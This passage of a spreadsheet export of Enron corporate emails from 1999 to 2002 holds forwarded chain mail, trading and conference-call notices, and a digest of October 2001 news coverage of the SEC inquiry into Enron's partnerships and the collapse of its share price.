&gt; &gt; &gt;&gt;       -somebody misses you_x000D_
&gt; &gt; &gt;&gt;       -somebody wants to talk to you._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to be with you._x000D_
&gt; &gt; &gt;&gt;       -somebody hopes you aren't in trouble._x000D_
&gt; &gt; &gt;&gt;       -somebody is thankful for the support you have provided._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to hold your hand._x000D_
&gt; &gt; &gt;&gt;       -somebody hopes everything turns out all right._x000D_
&gt; &gt; &gt;&gt;       -somebody wants you to be happy._x000D_
&gt; &gt; &gt;&gt;       -somebody wants you to find him/her._x000D_
&gt; &gt; &gt;&gt;       -somebody is celebrating your successes._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to give you a gift._x000D_
&gt; &gt; &gt;&gt;       -somebody thinks that you ARE a gift._x000D_
&gt; &gt; &gt;&gt;       -somebody hopes you're not too cold, or too hot_x000D_
&gt; &gt; &gt;&gt;       -somebody wants to hug you._x000D_
&gt; &gt; &gt;&gt;       -somebody loves you._x000D_
&gt; &gt; &gt;&gt;       -somebody admires your strength._x000D_
&gt; &gt; &gt;&gt;       -somebody is thinking of you and smiling._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to be your shoulder to cry on._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to go out with you and have a lot of fun._x000D_
&gt; &gt; &gt;&gt;       -somebody thinks the world of you._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to protect you._x000D_
&gt; &gt; &gt;&gt;       -somebody would do anything for you._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to be forgiven._x000D_
&gt; &gt; &gt;&gt;       -somebody is grateful for your forgiveness._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to laugh with you._x000D_
&gt; &gt; &gt;&gt;       -somebody remembers you and wishes that you were there._x000D_
&gt; &gt; &gt;&gt;       -somebody is praising God for you._x000D_
&gt; &gt; &gt;&gt;       -somebody needs to know that your love is unconditional._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to tell you how much they care._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to share their dreams with you._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to hold you in their arms._x000D_
&gt; &gt; &gt;&gt;       -somebody wants YOU to hold them in your arms._x000D_
&gt; &gt; &gt;&gt;       -somebody treasures your spirit._x000D_
&gt; &gt; &gt;&gt;       -somebody wishes they could STOP time because of you._x000D_
&gt; &gt; &gt;&gt;       -somebody praises God for your friendship and love._x000D_
&gt; &gt; &gt;&gt;       -somebody can't wait to see you._x000D_
&gt; &gt; &gt;&gt;       -somebody loves you for who you are._x000D_
&gt; &gt; &gt;&gt;       -somebody loves the way you make them feel._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to be with you._x000D_
&gt; &gt; &gt;&gt;       -somebody wants you to know they are there for you._x000D_
&gt; &gt; &gt;&gt;       -somebody's glad that you're his/her friend._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to be your friend._x000D_
&gt; &gt; &gt;&gt;       -somebody stayed up all night thinking about you._x000D_
&gt; &gt; &gt;&gt;       -somebody is wishing that you noticed him/her._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to get to know you better._x000D_
&gt; &gt; &gt;&gt;       -somebody wants to be near you._x000D_
&gt; &gt; &gt;&gt;       -somebody misses your advice/guidance._x000D_
&gt; &gt; &gt;&gt;       -somebody has faith in you._x000D_
&gt; &gt; &gt;&gt;       -somebody trusts you._x000D_
&gt; &gt; &gt;&gt;       -somebody needs you to send them this letter_x000D_
&gt; &gt; &gt;&gt;       -somebody needs your support._x000D_
&gt; &gt; &gt;&gt;       -somebody needs you to have faith in them._x000D_
&gt; &gt; &gt;&gt;       -somebody will cry when they read this._x000D_
&gt; &gt; &gt;&gt;       -somebody needs you to let them be your friend._x000D_
&gt; &gt; &gt;&gt;       -somebody hears a song that reminds them of you._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       SOMEBODY NEEDS YOU TO SEND THIS TO THEM._x000D_
&gt; &gt;_x000D_
&gt; _________________________________________________________________________x000D_
&gt; Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; --------------87F48CBEE9FA82F236F507C0--_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 13:00:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'anne_snyder@pgn.com'})</t>
  </si>
  <si>
    <t>RE: October detail</t>
  </si>
  <si>
    <t xml:space="preserve">10/11 _x000D_
_x000D_
Sales to PGE- Missing 50 mw llh buy/resale System to Mid-c.  _x000D_
_x000D_
-----Original Message-----_x000D_
From: Anne Snyder [mailto:Anne_Snyder@pgn.com]_x000D_
Sent: Tuesday, November 27, 2001 4:05 PM_x000D_
To: Scholtes, Diana_x000D_
Subject: October detail_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 09:53:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.millar@enron.com', 'ken.powers@enron.com', 'jan.moore@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'jebong.lee@enron.com', 'eric.gadd@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'vernon.mercaldo@enron.com', 'larry.swett@enron.com', 'chuck.wilkinson@enron.com', 'courtney.barker@enron.com', 'craig.buehler@enron.com', 'laura.lantefield@enron.com', 'michael.ratner@enron.com', 'steve.gilbert@enron.com', 'bob.stevens@enron.com', 'tom.halpin@enron.com', 'gabriel.chavez@enron.com', 'kent.miller@enron.com', "paul.y'barbo@enron.com", 'mike.barry@enron.com', 'kay.threet@enron.com', 'rick.dietz@enron.com', 'tk.lohman@enron.com', 'lon.stanton@enron.com', 'vicki.berg@enron.com', 'lisa.valley@enron.com', 'kevin.hyatt@enron.com', 'tim.johanson@enron.com', 'gerry.medeles@enron.com', 'richard.riehm@enron.com', 'frank.semin@enron.com', 'allen.cohrs@enron.com', 'penny.mccarran@enron.com', 'mark.mcconnell@enron.com', 'w..mcgowan@enron.com', 'jo.williams@enron.com', 'martha.janousek@enron.com', 'robert.mason@enron.com', 'martin.gonzalez@enron.com', 'g..stage@enron.com', 'john.pritchard@enron.com', 'vincent.strohmeyer@enron.com', 'donna.scott@enron.com', 'jane.joyce@enron.com', 'sean.bolks@enron.com', 'larry.pavlou@enron.com', 'bill.fowler@enron.com', 'steve.thomas@enron.com', 'michael.loeffler@enron.com', 'dana.jones@enron.com', 'stephanie.korbelik@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'joni.bollinger@enron.com', 'reyna.cabrera@enron.com', 'john.fiscus@enron.com', 'david.junus@enron.com', 'sheila.nacey@enron.com', 'glen.hass@enron.com', 'preston.roobaert@enron.com', 'stephen.herber@enron.com', 'steven.harris@enron.com', 'sue.neville@enron.com', 'kimberly.watson@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'steven.january@enron.com', 'rob.wilson@enron.com', 'lynn.blair@enron.com', 'lorraine.lindberg@enron.com', 'lindy.donoho@enron.com', 'pallavi.goradia@enron.com', 'chris.sebesta@enron.com', 'theresa.branney@enron.com', 'v.dickerson@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'stephen.dowd@enron.com', 'elberg.gelin@enron.com'})</t>
  </si>
  <si>
    <t>Phone Number for CERA Conference Call on 10/18</t>
  </si>
  <si>
    <t>If attending in Omaha, the call will be held in CRoom 697.  If in Houston or Minneapolis, please follow the instructions below:_x000D_
You are enrolled in CERA's North American Natural Gas Conference Call and Web Presentation, "Gas Market Winter Outlook: Fundamental Questions." on Thursday, October 18, 2001 at 10:00 a.m.CDT_x000D_
Please be sure to call-in to the following phone numbers for the conference call:_x000D_
Within the United States: 1-877-691-0877_x000D_
Confirmation Code: 542780_x000D_
_x000D_
To view the slides while on the call:_x000D_
To participate in the internet portion of our presentation (audio is by telephone), log on to the internet approximately 15-30 minutes before the presentation to ensure technological compatibility._x000D_
1. Point your browser to http://www.placeware.com/cc/visioncastconferencing_x000D_
2. Enter the following information, then click "Attend"_x000D_
? Your Name_x000D_
? Meeting ID: w542780_x000D_
? Meeting Key: 934386</t>
  </si>
  <si>
    <t>Mon, 17 Jan 2000 05:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cecilia.olvera@enron.com'})</t>
  </si>
  <si>
    <t>FW: UNO!!! the game</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Cecilia Olvera/HOU/ECT on 01/17/2000 _x000D_
01:16 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Jennifer Nguyen @ ENRON                           01/17/2000 01:09 PM_x000D_
	_x000D_
_x000D_
To: Cecilia Olvera/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FW: UNO!!! the game_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Jennifer Nguyen/Corp/Enron on 01/17/2000 _x000D_
01:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Larry Lenning &lt;larry@apbenergy.com&gt; on 12/21/99 02:18:13 PM_x000D_
To: Jennifer Nguyen/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: FW: UNO!!! the game_x000D_
_x000D_
_x000D_
_x000D_
I could not find the good email.  Sorry.  Can I send you that type of email_x000D_
or will you get in trouble? What are you doing for Christmas? Staying in_x000D_
Houston?_x000D_
_x000D_
----------_x000D_
From:  Tod Vaught_x000D_
Sent:  Monday, December 20, 1999 3:51 PM_x000D_
To:  Goddard Hampton; James Mueller; Kyle Galloway; Larry Lenning; Paul_x000D_
Lutz; Preston Higgins; Tony Tong; Will Vaughn_x000D_
Subject:  FW: UNO!!! the game_x000D_
_x000D_
_x000D_
_x000D_
----------_x000D_
From:  Erin Massey_x000D_
Sent:  Friday, December 17, 1999 3:54 PM_x000D_
To:  Tod Vaught_x000D_
Subject:  FW: UNO!!! the game_x000D_
_x000D_
Enjoy..._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Uno.exe_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 May 2000 09:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gary.gleeson@enron.com'})</t>
  </si>
  <si>
    <t>EOL Notices</t>
  </si>
  <si>
    <t>Gary:_x000D_
Mark Taylor and I are getting a bunch of these EOL notices but can't seem to _x000D_
get into them to see what they are when we click on them.  Can you help us _x000D_
out?  Amita suggested that I contact you._x000D_
Carol ext. 33989</t>
  </si>
  <si>
    <t>Wed, 12 Apr 2000 07:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.couvillon@enron.com', 'george.grant@enron.com', 'carlos.rodriguez@enron.com', 'susan.trevino@enron.com', 'kyle.lilly@enron.com', 'daren.farmer@enron.com', 'thu.nguyen@enron.com'})</t>
  </si>
  <si>
    <t>COPANOS CHANGES</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Ami Chokshi/Corp/Enron on 04/12/2000 _x000D_
02:03 PM ---------------------------_x000D_
_x000D_
_x000D_
troy_a_benoit@reliantenergy.com on 04/12/2000 01:30:55 PM_x000D_
To: "Ami Chokshi" &lt;Ami_Chokshi@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: COPANOS CHANGES_x000D_
_x000D_
_x000D_
(See attached file: HPL-Apr.xls)_x000D_
 - HPL-Apr.xls_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 10:22:28 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Enron Asks Citigroup for $750 Mln Loan, People Say (Update1)_x000D_
Bloomberg, 10/23/01_x000D_
_x000D_
Enron Corp. Cut to `Reduce' at Edward Jones_x000D_
Bloomberg, 10/23/01_x000D_
_x000D_
Enron CFO: Company Has Sufficient Liquidity_x000D_
Dow Jones News Service, 10/23/01_x000D_
Enron says shareholders' 'best interests' were sought in all LJM dealings_x000D_
AFX News, 10/23/01_x000D_
US class action suit filed against Enron for misleading statements_x000D_
AFX News, 10/23/01_x000D_
Word of SEC probe puts Enron into deep dive: Problems mount_x000D_
National Post, 10/23/01_x000D_
City - SEC inquiry sparks Enron share fall._x000D_
The Daily Telegraphm 10/23/01_x000D_
Shares of Enron Plummet 21% Energy: SEC requests information from company on series of unusual financial deals tied to executive._x000D_
Los Angeles Times, 10/23/01_x000D_
_x000D_
_x000D_
_x000D_
Enron Asks Citigroup for $750 Mln Loan, People Say (Update1)_x000D_
2001-10-23 10:11 (New York)_x000D_
_x000D_
Enron Asks Citigroup for $750 Mln Loan, People Say (Update1)_x000D_
_x000D_
     (Adds comment from CFO Fastow in fourth paragraph, Enron's_x000D_
short-term borrowing rates in seventh paragraph.)_x000D_
_x000D_
     New York, Oct. 23 (Bloomberg) -- Enron Corp., the biggest_x000D_
energy trader, has asked Citigroup Inc. to arrange a $750 million_x000D_
loan, ensuring access to credit if the embattled company is cut_x000D_
off from money markets, say people familiar with the matter._x000D_
_x000D_
     Enron's shares and bonds plunged yesterday after the company_x000D_
said the Securities and Exchange Commission was probing its_x000D_
finances. The Houston-based business, whose stock has fallen 75_x000D_
percent this year amid concerns about failed investments, depends_x000D_
on a $3 billion commercial paper, or short-term debt, program to_x000D_
finance day-to-day operations._x000D_
_x000D_
     Earlier this month, Moody's Investors Service placed all $13_x000D_
billion of the company's long-term debt securities on watch for_x000D_
possible downgrade. As a second-tier commercial paper borrower,_x000D_
any drop in its rating may cut off Enron from the commercial paper_x000D_
market and raise the costs of short-term debt._x000D_
_x000D_
     ``We understand that our credit rating is critical to both_x000D_
the capital markets and our counterparties,'' Enron's Chief_x000D_
Financial Officer Andrew Fastow said on a conference call today._x000D_
He said Enron has $3.5 billion available on bank credit lines,_x000D_
giving it enough cash to operate normally._x000D_
_x000D_
     Enron shares rose as much as 12.6 percent during the call to_x000D_
$23.25. They pared the gain to $21.80, up $1.15._x000D_
_x000D_
     Dan Noonan, a spokesman for Citigroup's Citibank NA unit,_x000D_
declined to comment. Mark Palmer, a spokesman for Enron, declined_x000D_
to comment._x000D_
_x000D_
                      Commercial Paper Rates_x000D_
_x000D_
     Enron was paying 3.15 percent to issue commercial paper until_x000D_
Oct. 31, which is as much as 15 basis points more than companies_x000D_
with the same ``A2/P2'' short-term credit ratings that are not on_x000D_
credit watch. Enron's short-term debt is not on review for a_x000D_
possible downgrade._x000D_
_x000D_
     Enron has previously turned to Citigroup for finance and_x000D_
advice. In 1999, Citigroup's Salomon Smith Barney unit advised the_x000D_
company on its $1.45 billion acquisition of three natural gas-_x000D_
fired power plants from Cogen Technologies Inc. Citibank, along_x000D_
with J.P. Morgan Chase &amp; Co., this year arranged a $1.75 billion_x000D_
loan._x000D_
_x000D_
     Earlier this week, an investor sued Enron, saying two_x000D_
partnerships cost the company $35 million and Fastow's leadership_x000D_
of them was a conflict of interest._x000D_
_x000D_
     The SEC has asked Enron about partnerships and affiliated_x000D_
companies headed by Fastow. Dismantling some of the partnerships_x000D_
would cost Enron or its shareholders as much as $3 billion, Ray_x000D_
Niles, a Salomon Smith Barney analyst, wrote in a report to_x000D_
investors._x000D_
_x000D_
     Enron created partnerships and affiliated companies to buy_x000D_
and sell assets such as power plants to lower the debt on its_x000D_
books._x000D_
_x000D_
     Investors said they were concerned that Enron may be forced_x000D_
to dismantle the affiliated companies by paying off the owners in_x000D_
cash or stock. Chief Executive Ken Lay said last week he may have_x000D_
to ``unravel'' agreements that created the companies if Enron's_x000D_
debt ratings fall too far._x000D_
_x000D_
--Mark Lake in the New York newsroom (212) 893-5989 or_x000D_
_x000D_
_x000D_
Enron Corp. Cut to `Reduce' at Edward Jones_x000D_
2001-10-23 11:42 (New York)_x000D_
_x000D_
     Princeton, New Jersey, Oct. 23 (Bloomberg Data) -- Enron Corp. (ENE US)_x000D_
was downgraded to ``reduce'' from ``accumulate'' by analyst Zach Wagner at_x000D_
Edward Jones._x000D_
_x000D_
--Michael O. Donohue in Princeton, New Jersey, (+1)609-279-3756._x000D_
_x000D_
_x000D_
_x000D_
Enron CFO: Company Has Sufficient Liquidity_x000D_
By Christina Cheddar_x000D_
Of DOW JONES NEWSWIRES_x000D_
_x000D_
10/23/2001_x000D_
Dow Jones News Service_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
NEW YORK -(Dow Jones)- Enron Corp. (ENE) Chairman and Chief Executive Kenneth Lay said the company had procedures in place to avoid conflicts of interest in dealings between Enron and partnerships that were set up and run by its chief financial officer, Andrew Fastow. _x000D_
Last week, the Securities and Exchange Commission asked the Houston energy trading company to provide additional information about the partnerships, which Enron said were off-balance sheet financing vehicles used to hedge against fluctuations in the market._x000D_
In a conference call held Monday to discuss investor concerns about the SEC investigation and related matters, Lay said there was a "Chinese wall" in place to protect the interest of Enron shareholders. _x000D_
The procedures were "rigorously followed," Lay said. _x000D_
In previous filings with the SEC, Enron said the terms of the transactions with the partnerships were "reasonable compared to those which could have been negotiated with unrelated third parties." _x000D_
Fastow resigned from the partnerships, which were known as LJM Cayman LP and LJM2 Co-Investments LP in late July. _x000D_
The company also is involved in other off-balance sheet financing vehicles, including Marlin Water Trust II and Whitewing. _x000D_
During the conference call, investors said they were frustrated by the complex nature of the trusts, and asked for more information. _x000D_
Lay said the company would be providing a list of "Frequently Asked Questions" on its Web site later Tuesday that may provide more details. _x000D_
After Enron disclosed the SEC investigation Monday, the company's stock sunk to its lowest level in 52 weeks, $19.67. Enron shares were recently trading up 47 cents, or 2.3%, at $21.12, in brisk volume that has already surpassed its average daily turnover of 6.3 million shares. _x000D_
Lay said he was "extremely disappointed" in the current stock price. _x000D_
"Our businesses are performing very well and we are continuing to conduct business," he said. _x000D_
_x000D_
During the conference call, Enron officials declined to specify Fastow's role in the partnership, citing the ongoing SEC investigation and a derivative lawsuit filed against Enron that alleges its board breached its fiduciary duties by allowing Fastow to create and run the partnerships. _x000D_
Enron officials also addressed concerns that investors had about the potential need to issue additional Enron stock. _x000D_
Under certain circumstances, for example, if both Enron's stock and credit rating fall to certain levels, the company would need to issue additional shares to the partnerships, diluting the holdings of current shareholders. _x000D_
Enron officials declined to say how much dilution would occur under a "worst-case scenario." _x000D_
However, the officials said they doubted there would be a need to issue the additional stock because the company plans to work with the credit-rating agencies to prevent such an event. _x000D_
Moody's put Enron on watch for a downgrade of its long-term debt last week after the company announced a $1 billion third-quarter write-off that produced a $618 million loss. _x000D_
According to Lay, Enron's debt rating would need to fall several notches to below investment grade in order to trigger the need to issue more stock. _x000D_
"We are committed to maintaining our ratings," Lay said. "Moody's said they would work with us," he added. _x000D_
Furthermore, Fastow said, Enron expects to have "sufficient liquidity" to meet all its capital requirements. _x000D_
_x000D_
Enron's efforts to unwind the LJM partnerships contributed to a reduction of $1.2 billion in shareholder equity. However, Enron's Lay said the lower number of shares outstanding wouldn't affect the company's earnings outlook. _x000D_
Enron has said it expects to earn $1.80 a share in 2001 and $2.15 a share in 2002. The numbers are in line with the consensus estimates reported by Thomson Financial/First Call. _x000D_
"Despite the economy going softer, we think we can meet that," Lay said. _x000D_
-By Christina Cheddar, Dow Jones Newswires; 201-938-5166; christina.cheddar@dowjones.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
Enron says shareholders' 'best interests' were sought in all LJM dealings_x000D_
_x000D_
10/23/2001_x000D_
AFX News_x000D_
(c) 2001 by AFP-Extel News Ltd_x000D_
_x000D_
NEW YORK (AFX) - Enron Corp said it sought the "best interests" of its shareholders in all its dealings with LJM Cayman LP and LJM2 Co-Investment LP, two partnerships which were set-up and run until recently by Enron chief financial officer Andrew Fastow. _x000D_
"The board (of Enron) was fully aware and kept a real Chinese wall between Enron and LJM. Enron's shareholders best interests were sought in all LJM dealings," said Enron chief executive officer Kenneth Lay, in a conference call with analysts._x000D_
The company scheduled the call after Enron's stock slid 21 pct yesterday, when it revealed the Securities and Exchange Commission asked the company to provide information on certain related-party transactions. _x000D_
Overnight, two class action lawsuits were launched by shareholders against Enron and its officers, alleging that operating results were also "materially overstated" as a result of the company failing to timely write-down the value. _x000D_
In its third-quarter results last week, Enron announced a charge of 1.01 bln usd, of 1.11 usd per share, and an incremental 1.2 bln usd reduction in stockholders' equity, related to the unwinding of investments with the LJM partnerships. _x000D_
According to the Wall Street Journal, Fastow resigned from the partnerships in July, due to growing suspicion over potential conflicts of interests. _x000D_
During the call, Lay said that he, and Enron's board of directors, have "the highest faith and confidence in (Fastow)." _x000D_
Lay also said the company remained confident that its current liquidity position allows it to meet all its obligations, and is confident of the outlook for its corporate rating. _x000D_
Analysts have raised the possibility that, should Enron's credit rating and stock price continue to fall, the company may be obligated to issue millions of new shares to meet obligations with other entities it deals with. _x000D_
ng/cml For more information and to contact AFX: www.afxnews.com and www.afxpress.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
_x000D_
US class action suit filed against Enron for misleading statements_x000D_
_x000D_
10/23/2001_x000D_
AFX News_x000D_
(c) 2001 by AFP-Extel News Ltd_x000D_
_x000D_
NEW YORK (AFX) - Milberg Weiss Bershad Hynes &amp; Lerach LLP law firm said it filed a class action lawsuit yesterday against Enron Corp alleging that it issued misleading statements between Jan 18, 2000 and Oct 17, 2001, thereby inflating the company's share price artificially. _x000D_
The suit was filed on behalf of Enron shareholders between the above period and is pending in the US District Court in Houston against Enron Corp, Enron CEO Kenneth Lay, former Enron CEO Jeffrey Skilling, who resigned recently, and Enron chief financial officer Andrew Fastow. _x000D_
The suit claims that Enron issued statements which failed to disclose that the company was experiencing a declining demand for bandwidth and that its efforts to create a trading market for bandwidth failed because many market participants were not creditworthy._x000D_
The company's operating results were also "materially overstated as result of the company failing to timely write-down the value of its investments with certain limited partnerships" managed by the company's CFO. The suit additionally alleges that Enron was failing to write-down impaired assets on a timely basis in accordance with GAAP. _x000D_
On Oct 16, Enron announced unexpectedly that it was taking third quarter non-recurring charges of 1.01 bln after-tax, or 1.11 usd per share, which it later revealed was due largely to the unwinding of investments with certain limited partnerships controlled by Enron's chief financial officer. Enron also announced it was cutting shareholder equity by 1.2 bln usd. _x000D_
Enron's share price consequently fell sharply. During the class period, Enron insiders disposed of 73 mln usd of personally-held Enron common stock. _x000D_
Holders of Enron stock between the class period in question may request appointment as a lead plaintiff no later than Dec 21, Milberg Weiss said. _x000D_
Yesterday, Enron announced that the Securities and Exchange Commission has requested that it provide information regarding certain related party transactions. _x000D_
jkm/shw For more information and to contact AFX: www.afxnews.com and www.afxpress.com_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Financial Post: News_x000D_
Word of SEC probe puts Enron into deep dive: Problems mount_x000D_
David Howard Sinkman_x000D_
Reuters_x000D_
_x000D_
10/23/2001_x000D_
National Post_x000D_
National_x000D_
FP2_x000D_
(c) National Post 2001. All Rights Reserved._x000D_
_x000D_
NEW YORK - Shares of Enron Corp. slumped more than 20% yesterday after it said U.S. regulators are looking into company transactions, another blow to a company whose chief executive resigned in August. _x000D_
A spokesman for North America's biggest buyer and seller of natural gas and electricity declined to discuss an inquiry by the U.S. Securities Exchange Commission, but said it was cooperating._x000D_
The SEC also declined to outline details of its inquiry. _x000D_
Investor confidence in the company has been rocked by reports from The Wall Street Journal about its relationship with two limited partnerships that were run until recently by Enron's chief financial officer, Andrew Fastow. _x000D_
The company also reported last week its first quarterly loss in more than four years, and took US$1.01-billion in charges and writedowns on ill-fated investments. _x000D_
Problems at Enron surfaced two months ago when CEO Jeff Skilling resigned after six months at the helm. _x000D_
Enron shares declined US$5.49, or 21%, to US$20.56 in afternoon trade on the New York Stock Exchange yesterday, shaving off almost US$4.2-billion of its market capitalization. _x000D_
The stock, the biggest decliner by percentage loss on the NYSE, fell as much as 22.8% yesterday, when it opened at its lowest level since September 1998. _x000D_
Enron declined to comment on whether the SEC's inquiry into "certain related-party transactions" involved the partnerships. _x000D_
"Related-party transactions" is the heading used by Enron in its 1999 and 2000 annual reports to discuss dealings with its limited partnerships, LJM Cayman LP and the larger LJM2 Co-Investment LP, which engaged in complex hedging transactions involving company assets worth hundreds of millions of dollars. _x000D_
Mr. Fastow severed his ties with the partnerships in June. LJM was set up in June 1999 for energy-related investments, and LJM2 in December 1999 for energy- and communication-related investments. _x000D_
The Journal reported US$35-million of its third-quarter loss of US$638-million were connected with the limited partnerships _x000D_
Curt Launer, an analyst at Credit Suisse First Boston, said investors should question Enron's use of real value accounting when the value of certain assets, "most notably in telecommunications," have declined precipitously. _x000D_
"Investors have had several opportunities to question Enron's credibility and at each of those turns the share price has declined," Launer said. _x000D_
Some analysts, though, cautioned against assuming fire when there might only be smoke. _x000D_
"This is an inquiry, not an investigation, and I cannot imagine Enron's attorneys or accountants would allow it do to something illegal," said Merrill Lynch analyst Donato Eassey. _x000D_
"It's easy for the market to kick a company when its down, but these challenges do not last for a solid company, and we think Enron is one." _x000D_
The price of shares in the company is down 75% this year._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
City - SEC inquiry sparks Enron share fall._x000D_
By Simon English._x000D_
_x000D_
10/23/2001_x000D_
The Daily Telegraph_x000D_
P31_x000D_
(c) Telegraph Group Limited, London, 2001_x000D_
_x000D_
in New York _x000D_
ENRON, the American power giant, saw its shares slump by a fifth yesterday after it revealed that the top financial watchdog is delving into firms managed by chief financial officer Andrew Fastow._x000D_
The Securities and Exchange Commission is requesting details of deals between the company and limited partnerships with which Mr Fastow has, or had, links. _x000D_
Enron chairman Kenneth Lay said in a statement: "We welcome this request. We will co-operate fully and look forward to the opportunity to put any concern about these transactions to rest." _x000D_
Questions were raised last week on Wall Street after the company announced a write-down of more than $1 billion due to failed investments in telecoms and other businesses. _x000D_
The disclosure alarmed investors and sent the already battered shares down 23pc. Yesterday they fell another $5.30 ( #3.80) to $20.75 in early trading. _x000D_
According to the annual report the "related party transactions", as Enron describes them, took place in 1999 and 2000, resulting in losses of $16m and $36m respectively. _x000D_
Mr Lay said that auditors approved the deals, but would not give further details of what they were. _x000D_
They are understood to have been hedging transactions against Enron shares and other assets made by partnerships called LJM Cayman LP and LJM2 Co-Investment JP. _x000D_
"We believe everything that needed to be considered and done in connection with these transactions was considered and done," added Mr Lay. _x000D_
The relationship between the investment losses and the SEC probe is not clear, though the inquiry seems to focus on the partnerships responsible for the hedging transactions. _x000D_
Enron owns Teesside Power Station and Wessex Water in Britain and is the largest trader of natural gas in the US. Investors are concerned that the probe and the continued uncertainty about the extent of the problem will harm the company's credit rating. _x000D_
An Enron spokesman said Mr Fastow continues to work and is not under any suspicion. _x000D_
The SEC inquiry is "informal", says the company. The watchdog contacted Enron last Wednesday, the day of the results announcement. The SEC declined to comment. _x000D_
Enron made a loss of $638m in the third quarter, its first in over four years._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Business; Financial Desk_x000D_
Shares of Enron Plummet 21% Energy: SEC requests information from company on series of unusual financial deals tied to executive._x000D_
NANCY RIVERA BROOKS_x000D_
TIMES STAFF WRITER_x000D_
_x000D_
10/23/2001_x000D_
Los Angeles Times_x000D_
Home Edition_x000D_
C-1_x000D_
Copyright 2001 / The Times Mirror Company_x000D_
_x000D_
Shares of Enron Corp. set a 52-week low Monday on word that the Securities and Exchange Commission had asked for information about a complex series of financial transactions between the Houston-based energy giant and an investment partnership tied to a company executive. _x000D_
Enron, the world's largest energy trader, said it had voluntarily provided information on "certain related-party transactions" that had been previously disclosed to the SEC._x000D_
"We welcome this request," said Kenneth L. Lay, Enron chairman and chief executive. _x000D_
"We will cooperate fully with the SEC and look forward to the opportunity to put any concern about these transactions to rest," he said. _x000D_
The SEC request is the latest in a parade of bad news for Enron, which has seen investments sour in telecommunications, retail electricity sales and water. _x000D_
Investors have battered the company's stock, which once sold for nearly $85 a share in the last year, and many have criticized Enron's stingy meting out of financial information. But several Wall Street analysts remain upbeat on the stock, noting that the bulk of its businesses continue to thrive despite the growing economic downturn. _x000D_
In August, Enron Chief Executive Jeffrey K. Skilling, one of the main architects of the company's strategy of shedding physical assets in search of trading profit, stunned Wall Street by resigning. _x000D_
Skilling cited personal, family-related reasons, but later he acknowledged that the precipitous plunge in the company's stock price contributed to his departure. _x000D_
On Monday, Enron shares plunged $5.40, or nearly 21%, to close at $20.65 on the New York Stock Exchange. _x000D_
Enron's stock has lost nearly 40% of its value in the last week since it reported a surprise third-quarter loss of $618 million after $1.01 billion in charges reflecting the costs of recent failed investments. _x000D_
But the charge also included $35 million related to what Enron described only as the "early termination during the third quarter of certain structured finance arrangements with a previously disclosed entity." _x000D_
In a conference call with securities analysts about the earnings, the company mentioned that it had repurchased 55 million shares as part of the dissolution of its participation in the transactions. _x000D_
But investors were stunned when stories last week in the Wall Street Journal detailed that the transactions were with a limited partnership organized by Andrew S. Fastow, Enron's chief financial officer, and that Enron had whittled $1.2 billion off its shareholder equity as it repurchased the shares and canceled a $1.2-billion note it had received from the partnership. Shareholder equity now stands at $9.5 billion. _x000D_
The limited partnership, called LJM2, and Fastow reaped millions of dollars of profit through complex hedging transactions that involved Enron assets and stock, the Journal reported. _x000D_
Lay said the transactions were reviewed by auditors and lawyers inside and outside the company and that the company board was fully informed. _x000D_
A shareholder lawsuit charging that Enron's directors violated their fiduciary duty already has been filed in Texas state court. _x000D_
